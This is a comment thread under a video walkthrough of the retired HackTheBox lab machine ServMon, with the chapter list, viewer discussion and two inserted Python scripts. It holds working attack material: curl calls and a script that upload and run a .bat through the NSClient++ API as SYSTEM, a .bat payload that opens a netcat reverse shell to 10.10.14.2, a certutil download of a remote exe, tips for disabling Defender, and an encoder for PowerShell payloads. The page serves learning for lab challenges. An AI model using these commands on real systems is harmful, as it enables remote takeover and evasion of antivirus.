HackTheBox - ServMon

Views: 34,561

IppSec

1 day ago

00:00 - Intro
00:50 - Start of NMAP
03:45 - Using SMBClient to search for open shares (None)
04:30 - Checking out the web page, some light fuzzing on login and examining how the language selection works
07:55 - Taking a Screenshot on Parrot and pasting it into Cherry Tree (Shift+PrintScreen)
14:30 - Checking out FTP and downloading the two txt files
16:30 - Viewing port 8443, and realizing this page really hates firefox. Switch to Chromium
19:05 - Using searchsploit to find there's a directory traversal exploit in NVMS
20:05 - Grabbing Passwords.txt off Nathan's Desktop (filename was an FTP Note)
22:50 - Using CrackMapExec to bruteforce logins for SMB and SSH (the SSH bug is already fixed in the dev branch)
26:00 - Logging in with SSH, then looking for WebServer directories
30:20 - Examining the NSClient directory to view the config
33:40 - Using SSH to setup a port forward
35:50 - Lots of flailing around trying to get code execution
44:00 - Enough flailing, box reverted and do a clean run of this exploit
49:00 - Flailing around trying to get Nishang to run... Defender is giving me issues.
59:30 - Giving up with Defender Evasion, switching to nc.exe to get a reverse shell
1:01:20 - Reverse shell returned as SYSTEM, grabbing root.txt

Comments: 97
@jonathanwelch4845, 3 years ago
Long time listener, first time caller. Great video, IppSec. Really enjoyed learning from your process and how you troubleshoot your way through. Thanks for sharing!
@ahmadmaulana3622, 3 years ago
Nicely done as usual. What I did was a little bit different. Instead of dealing with the pain-in-the-ass web GUI, I hit the API from the command line. We can even upload the script from the API :)
@ichigok2594, 3 years ago
Thanks for the video. I learn a lot from you.
@SuperDanut, 3 years ago
Great work! Thank you!
@onlyastron4ut, 3 years ago
Couldn't figure out how to root this box.. Thanks for the great insight in your methodology!
@fjank1680, 3 years ago
Nice! Got the user, but was baffled on where to begin privesc on Windows; good to see where I messed up. I did not try another browser, so I did not look into that part any more, and of course hit a brick wall.
@cmdrtotallydead5418, 3 years ago
Hi IppSec, just a quick correction on your video. When you were trying to get ntuser.data, the file should have been ntuser.dat, which is the user registry hive. Once again, a good video.
@ippsec, 3 years ago
Ah, yeah. Funny the mistakes made when doing things live and manually :-). There's definitely some value in scripting out tools to do this stuff.
@zedrobot5864, 3 years ago
Thank you for your videos, very helpful.
@NimbleSF, 4 months ago
That SSH command to start up the port forward without having to escape your SSH is so freakin cool.
@user-yj8jr9gl5x, 3 months ago
I didn't know how to do it; would you tell me?
@BlackHermit, 3 years ago
Crashing the box is great :D
@mehdiboujid8761, 3 years ago
Having someone to rely on whenever you have a problem with these types of things is really helpful. Too bad I don't have one T-T
@danielmorris5302, 3 years ago
The method to get SYSTEM on this box was intended to be done through the API. Upload nc to the box first and then create a bat file with the command to execute nc, then:
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/file.bat --data-binary @file.bat
curl -k -i -u admin https://localhost:8443/api/v1/queries/file/commands/execute
All done without needing the nsclient password.
@ippsec, 3 years ago
I highly doubt that was the intended route. If so, the box would have been rated Medium by HTB Staff due to the documentation around that API being so bad.
@danielmorris5302, 3 years ago
Hey, it's my box. I'm dmw0ng. There were multiple methods, but the intended one was to use the API. I thought it would be easy, knowing that restarting the nscp service would kill it for everyone. I thought it would be a lesson to all not to just find an exploit and blindly follow it.
@ippsec, 3 years ago
@@danielmorris5302 Ah, sorry. I had checked the author-provided writeup after solving the box and there was no mention of the API. Perhaps it was an old version.
@danielmorris5302, 3 years ago
@@ippsec I submitted the doc with a method similar to what you described. However, after discussions with staff, it seemed it was not feasible, so I then provided additional docs to highlight the preferred method. This box was a carbon copy of what I discovered somewhere during a pentest; I was the only person on the box, and therefore did not have the issues that you get when multiple people are on it. That's why I submitted the original documentation as I did. A shame, because it was as real-life as I could get it because of the find. Unfortunately, a badly rated box, but HTB always produce incredible boxes, so this one will soon be forgotten. 🤭 Good job with your patience.
@karanluniyal3516, 3 years ago
@@danielmorris5302 Apart from the little problems at the end, man, this is a very unique and great box. I learnt a lot. Respect for sharing this box and knowledge with us all.
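The two curl calls the box author gives above are the whole privilege escalation: NSClient++ exposes a REST API that stores an external script and then runs it as the service account, which on ServMon is SYSTEM. The API is reached through the SSH local port forward from the video (33:40) because NSClient++ only honours requests from the hosts listed in its config, which is also why a direct hit on 8443 gets the "403 Your not allowed" several people mention. The Python below is an added example, not the video's or dmw0ng's code: it sends the same PUT-then-GET exchange with HTTP Basic auth, and includes a constructed stub server so the client can be run offline. The endpoint paths are the ones posted above and are assumed to match the target's NSClient++ version; the host, credentials, 10.10.14.2 listener and .bat contents are lab placeholders.

```python
"""Script upload + execute through the NSClient++ REST API (added example, not from the video).

Endpoint paths are the ones dmw0ng posted above and are assumed to match the target's NSClient++
version; host, credentials and the .bat payload are placeholders. StubNSClient is a constructed
stand-in so the client can be exercised offline.
"""
import base64
import json
import ssl
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_PATH = "/api/v1/scripts/ext/scripts/{name}"        # PUT: store an external script
EXECUTE_PATH = "/api/v1/queries/{query}/commands/execute"  # GET: run the query it registers


def basic_auth(user, password):
    # curl -u sends HTTP Basic; the script runs with the NSClient++ service's privileges.
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}


def upload_and_execute(base_url, user, password, script_name, script_body):
    """PUT the script, then GET its execute endpoint. Returns (put_status, exec_status, exec_json)."""
    headers = basic_auth(user, password)
    # The real service sits behind a self-signed certificate on 8443; skip verification for the lab only.
    ctx = ssl._create_unverified_context() if base_url.startswith("https") else None
    put = urllib.request.Request(base_url + UPLOAD_PATH.format(name=script_name),
                                 data=script_body, method="PUT", headers=headers)
    with urllib.request.urlopen(put, context=ctx) as resp:
        put_status = resp.status
    query = script_name.rsplit(".", 1)[0]  # file.bat is exposed as the query "file"
    run = urllib.request.Request(base_url + EXECUTE_PATH.format(query=query), headers=headers)
    with urllib.request.urlopen(run, context=ctx) as resp:
        return put_status, resp.status, json.loads(resp.read())


class StubNSClient(BaseHTTPRequestHandler):
    """Constructed stand-in: accepts the two calls above with the right Basic auth, 403 otherwise."""
    scripts = {}
    expected = basic_auth("admin", "lab-password")["Authorization"]

    def _reply(self, code, body=None):
        self.send_response(code)
        if body is not None:
            self.send_header("Content-Type", "application/json")
        self.end_headers()
        if body is not None:
            self.wfile.write(body)

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain before answering
        prefix = UPLOAD_PATH.split("{")[0]
        if self.headers.get("Authorization") != self.expected:
            return self._reply(403)  # NSClient++ also answers 403 for a host outside "allowed hosts"
        if not self.path.startswith(prefix):
            return self._reply(404)
        self.scripts[self.path[len(prefix):]] = body
        self._reply(200)

    def do_GET(self):
        if self.headers.get("Authorization") != self.expected:
            return self._reply(403)
        parts = self.path.strip("/").split("/")  # api / v1 / queries / <name> / commands / execute
        known = {name.rsplit(".", 1)[0] for name in self.scripts}
        if len(parts) == 6 and parts[2] == "queries" and parts[4:] == ["commands", "execute"] \
                and parts[3] in known:
            result = {"command": parts[3], "result": 0,
                      "lines": [{"message": "stub: would run " + parts[3] + " as the service user"}]}
            return self._reply(200, json.dumps(result).encode())
        self._reply(404)

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo():
    """Drive the client against the stub; returns the good-auth result and the status a bad password gets."""
    server = HTTPServer(("127.0.0.1", 0), StubNSClient)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_port}"
    # Constructed payload: the .bat launches an nc.exe that was already dropped on the box.
    bat = b"@echo off\r\nC:\\Temp\\nc.exe 10.10.14.2 443 -e cmd.exe\r\n"
    try:
        good = upload_and_execute(base, "admin", "lab-password", "file.bat", bat)
        try:
            upload_and_execute(base, "admin", "wrong", "file.bat", bat)
            bad_status = 200
        except urllib.error.HTTPError as err:
            bad_status = err.code
    finally:
        server.shutdown()
        server.server_close()
    return {"good": good, "bad_auth_status": bad_status}


if __name__ == "__main__":
    print(demo())
```

Against the real box, point base_url at the forwarded port (for example https://127.0.0.1:8443 after ssh -L 8443:127.0.0.1:8443) and supply the password read from the NSClient++ config at 30:20; the upload step is what the web GUI's script editor does under the hood, so it is equally exposed to anyone who can reach the API with the password.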
@elliotalderson957, 3 years ago
35:41 That Laugh made my day
@n30_C0n, 3 years ago
For real! Lol, I'm not sure I've ever heard him laugh before.
@icon0clast274, 3 years ago
That specific error from defender is AMSI (Anti-malware scan interface) blocking your powershell execution.
@MKVD, 3 years ago
The privesc was so damn annoying because everyone was accidentally crashing the box :D
@noname-yo3zl, 3 years ago
Can someone explain to me, why OWASP says (about directory traversal) that: "In Windows an attacker can navigate only in a partition that locates web root..." and here we can navigate in the whole disk?
@kalidsherefuddin, 2 years ago
Ok, thanks.
@izaak791, 3 years ago
36:32 "Why make it so complicated?" If IppSec says it's complicated then you know you went too far with it, lol. BTW, Windows Defender is getting stronger every day... most of the old tricks are all getting blocked recently, almost made me cry once.
@mr.fakeman4718, 3 years ago
You are not alone with it.
@elikelik3574, 3 years ago
Hi. I have 2 questions: 1) Why, after getting a shell, did he not use winPEAS or some tool for privilege escalation? I mean, wouldn't it be easier to gather information? 2) 59:31, here, after getting trouble with New-Object, couldn't he try to download that PowerShell file with curl or wget? Why did he use nc? Thanks in advance.
@TongaRoots, 3 years ago
Did it happen to anybody that the password to log into NSCLIENT++ web interface just didn't work? I tried on Firefox and Chrome after tunneling and I keep getting "403 Your not allowed" even though the password is the same IppSec used which is really frustrating.
@underground635, 3 years ago
Is that the Pwnbox or is it your local setup?
@mugundhanbalaji, 3 years ago
@ippsec You got a command prompt; Get-Service is a PS cmdlet.
@LifeInFiveMinutes, 6 months ago
Hi IppSec, I wonder why a port forward is needed for the credentials to get accepted? Could you please enlighten me?
@mr.fakeman4718, 3 years ago
Every video is one step towards giving up for me. As a learner I have to stop and take a step back. However, I do think that there is a point to ask for suggestions. So, here is my question: How to learn? With HTB, it is hard to pop a box even now. Has the learning process changed or something? I'm clueless...
@TheHectorshark, 3 years ago
It's not about being the best, it's about learning. There is so much to learn about computer science and hacking. If you get tired of HTB, search for other interesting subjects like reversing or cryptography; they may interest you more because they look new. Also, try other pages. HTB gets boring sometimes. I recommend cryptohack.org. Don't put too much pressure on yourself; do it for the thrill of learning what surrounds you.
@mr.fakeman4718, 3 years ago
@@TheHectorshark I understand. Thank you very much for the response! Will leave that here in case somebody has the same issue. You hit me with cryptography because I'm a crypto guy. Reversing? Not so much my bread, but trying harder will work here for me. For popping boxes, well, leaving it for a while seems okay for now. Again, thank you!
@j.stan8916, 3 years ago
With every box you go over you have more knowledge. More knowledge = more chance to do stuff individually. Before running learn to walk kind of thing. I started this in March from literally zero (0) Linux, Networking knowledge with the goal to get my OSCP. On every retired box I go over I take extensive notes and make sure I understand the point of why something is done. It's a very effective studying technique which I can suggest you to follow. Don't be discouraged and expect too much of yourself from the start. Just keep on grinding and it will come in time just as everything in life does.
@happyharry2145, 3 years ago
Just adding this answer for anyone who's just starting like me: HTB is hard for a beginner. I would suggest trying tryhackme.com, as it walks you through everything and explains it. Nonetheless, IppSec is a great source of information and I recommend you watch every week's machine and try to do it like him, or in a different way through reading the write-ups in the HTB forums. Retired boxes are active for free users for 2 weeks after retiring.
@TripleHates, 3 years ago
Hey guys, does anyone know where IppSec found his terminal color scheme? Maybe it is a theme? I really like it but can't find it... I am using Gogh atm but there is no color scheme like this :(
@matthewbreeden7258, 3 years ago
I do the Windows registry query to pull the system version:
reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName
and I tend to lean more on the Windows cmd for a reverse shell if PowerShell fails:
certutil.exe -urlcache -split -f http://10.10.14.2/file.exe file.exe
Thank you for all you do, IppSec.
@robinhood3841, 3 years ago
Can you explain why you encoded the payload before you send it to powershell ?
@ippsec, 3 years ago
Because it has less chance to fail. New lines, quotes, spaces, etc can cause things to fail when passing commands through the command line. Encoding saves you from that headache
@robinhood3841, 3 years ago
@@ippsec Thanks, but I mean the little-endian encoding (iconv -t utf-16le) before the base64 encoding.
@leonardotornesello930, 3 years ago
@@robinhood3841 The different encoding is due to the different environment he is interfacing with. He's passing data from a Linux system (which uses UTF-8) to a Windows environment (which uses UTF-16).
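The thread above asks why the payload goes through iconv -t utf-16le before base64. PowerShell's -EncodedCommand parameter is defined as base64 over the UTF-16LE bytes of the script, so that is the only encoding it will decode; the base64 wrapper is what keeps quotes, spaces and newlines from being mangled by cmd.exe or the SSH command line, as IppSec says. The Python below is an added example, not code from the video or the commenters: it produces the same blob the iconv | base64 pipeline would, checks the round trip, and applies the same decode to a logged command line, which is how a defender reads such payloads back out of process-creation events. The command-line flag spellings matched and the sample command lines are assumptions for illustration.

```python
"""PowerShell -EncodedCommand encoding and decoding (added example, not from the video).

encode_powershell_command() is the Python equivalent of `iconv -t utf-16le | base64 -w0`;
extract_encoded_from_cmdline() runs the same operation backwards on a logged command line.
"""
import base64
import re


def encode_powershell_command(script: str) -> str:
    # 'utf-16le', not 'utf-16': the latter prepends a byte-order mark, which PowerShell rejects.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd byte length")
    return raw.decode("utf-16le")


def build_command_line(script: str) -> str:
    """What you would paste into the SSH / cmd.exe prompt on the target (flags are assumptions)."""
    return ("powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
            + encode_powershell_command(script))


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...);
# "-e" followed by "n..." or "c" covers those without matching -ExecutionPolicy / -ep.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")


def extract_encoded_from_cmdline(cmdline: str):
    """Detection side: return the decoded script from a logged command line, or None if no -enc blob."""
    m = _ENC_FLAG.search(cmdline)
    return decode_powershell_command(m.group(1)) if m else None


if __name__ == "__main__":
    # Constructed script with the characters that break unencoded one-liners: quotes and a newline.
    script = 'Write-Output "it\'s fine"\nStart-Sleep 1'
    line = build_command_line(script)
    print(line)
    print(extract_encoded_from_cmdline(line))
```

The decoder is deliberately strict (validate=True, even length) so that a truncated or edited blob in a log raises instead of silently yielding garbage; on the offensive side, the same strictness is why a stray BOM or a UTF-8-encoded blob fails to run on the target.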
@RajeshKumar-fo9ly, 3 years ago
You are a pro; I am also trying to become a pro like you through your videos 😂😂😂
@renniepak, 3 years ago
You should give FFUF a try instead of gobuster. Best of gobuster and WFUZZ combined.
@ndk9603, 3 years ago
Hello IppSec, I hope you read this. You are extremely talented, dude. Why don't you make a Udemy course, like a 40-hour course, and sell it for 50 dollars or something that's good with you? I hope you do it and I will be the first one to buy, because you're above average in your techniques and everything, man. Much respect and I wish you a good day :)
@jt1731, 3 years ago
So what was the reasoning for the switch to Parrot?
@tamaskantor1822, 3 years ago
kzfaq.info/get/bejne/brF6mMWn0sqVdp8.html
@rawkstar952, 3 years ago
How come ../../User/Nathan is a 404, but when you put /Desktop/passwords.txt you get a 200? Could you please enlighten me?
@ippsec, 3 years ago
It's just because however the webserver is accessing the file, it errors out on a directory, and the webserver returns a 404 whenever there's an error.
@dbeeeeee, 3 years ago
Because it was vulnerable to LFI, only files can be viewed, not dirs!
@rawkstar952, 3 years ago
@@ippsec Thanks! I've been learning a lot from you, though it's really hard for me to be qualified in HackTheBox. You're one of my inspirations. More power to the channel!
@rawkstar952, 3 years ago
@@dbeeeeee Thanks! I should learn LFI.
@mayankmehra722, 3 years ago
Why use PowerShell encoded commands? Can't it work without encoding?
@Ms.Robot., 3 years ago
Mmmmmm, better than sex! I would love to see all your tools. Inspiration to dive deeper for root, no matter where the box resides.
@laiyintam6349, 3 years ago
How come this box retired so fast?
@DG-qt3qn, 2 years ago
PSA: nc.exe is flagged by AV on this box now. Most walkthroughs don't work anymore. Updated Defender, I guess.
@wutangdaug, 2 years ago
Well, executing a payload is not always the solution. Maybe we can look at creating a new user with admin permissions, or disabling Defender with a command.
@josephseed3393, 2 years ago
There's a way around that. Use the PowerShell Set-MpPreference command to disable active real-time monitoring by the AV. This only works if you can execute commands as NT AUTHORITY, which you can by using the nsclient++ vulnerability.
@josephseed3393, 2 years ago
And then you can run any exe without any issues. That's how I rooted the box.
@Xx-nd1rs, 10 months ago
nc64.exe worked with me
@moonlessiguana1826, 9 months ago
@@Xx-nd1rs How does this work? I don't understand.
@windwest720, 3 years ago
This box is broken
@MukeshSingh-ew7ld, 3 years ago
How do I develop my skills just like you? Please reply.
@farhaaniqbal224, 3 years ago
Ah, you just need to buy my very expensive book, and it comes with a free certificate. Just practice more. Replay old HackTheBox.
@jt1731, 3 years ago
Try harder
@punitchoudhary1490, 3 years ago
Please make getting-started videos for beginners 🙂
@KrakoonGaming, 3 years ago
Do you use Parrot OS as your primary OS, or do you use it on VMware? Which is the best option for pentesting? Please tell me.
@arwl, 3 years ago
IppSec runs Parrot in a VM. As for the best option, it comes down a lot to preference. Using distros like Kali or Parrot is nice and easy to start with, as you've got basically any tool you want pre-installed, but you can use any distro you like as long as it has packages for the tools you want.
@buestrm2841, 3 years ago
It was strange that you were able to access nsclient in the beginning without port forwarding...
@Alexarr, 3 years ago
Not really, the VPN of HackTheBox is made for that.
@ippsec, 3 years ago
I think he was trying to access it over Firefox, which gives random errors and can make it seem closed.
@buestrm2841, 3 years ago
@@ippsec Actually when I did this box it was a total mess. Port 8443 was only open internally.
@Reelix, 3 years ago
@@buestrm2841 I had 8443 open, but couldn't access it with a browser, and a raw GET / command through nc on 8443 failed as well.
@devbidesmega1662, 3 years ago
What is IppSec's IRL name?
@alvinsmith8420, 2 years ago
Sep 11th, 2021: nc.exe no longer works with Windows Defender. Try XC by xct.
@Marcos15559, 3 years ago
This was a good priv escalation, but it is damn annoying!
@madison9182, 3 years ago
Should we have a license for Burp?
@happyharry2145, 3 years ago
No, it has a free version.
@Jaiswalkatul, 3 years ago
Because of this mess I missed my chance of getting my first root on live machines.
@thecast6157, 3 years ago
Try Traceback; it was the first root on any active machine I got.
@armandkruger911, 2 years ago
For IEX try: $env:comspec[4,15,25] -join ''
@buestrm2841, 3 years ago
58:36 How did it identify the script as malicious before even requesting it from the web server? 😂
@xXThePr0Xx, 3 years ago
It's not about the script but the IEX command that tries to make a connection to a remote server.
@Reelix, 3 years ago
@@xXThePr0Xx The question is how it knew it was malicious even with the IEX removed. It must have been one heck of an over protective anti-virus to assume that powershell doing a WebClient call was malicious o_O
@goonman1255, 3 years ago
That was an easy? lol
@thatcrockpot1530, 3 years ago
I wanted to punch whoever made that cancer of a UI tbh. So unnecessarily unintuitive lmao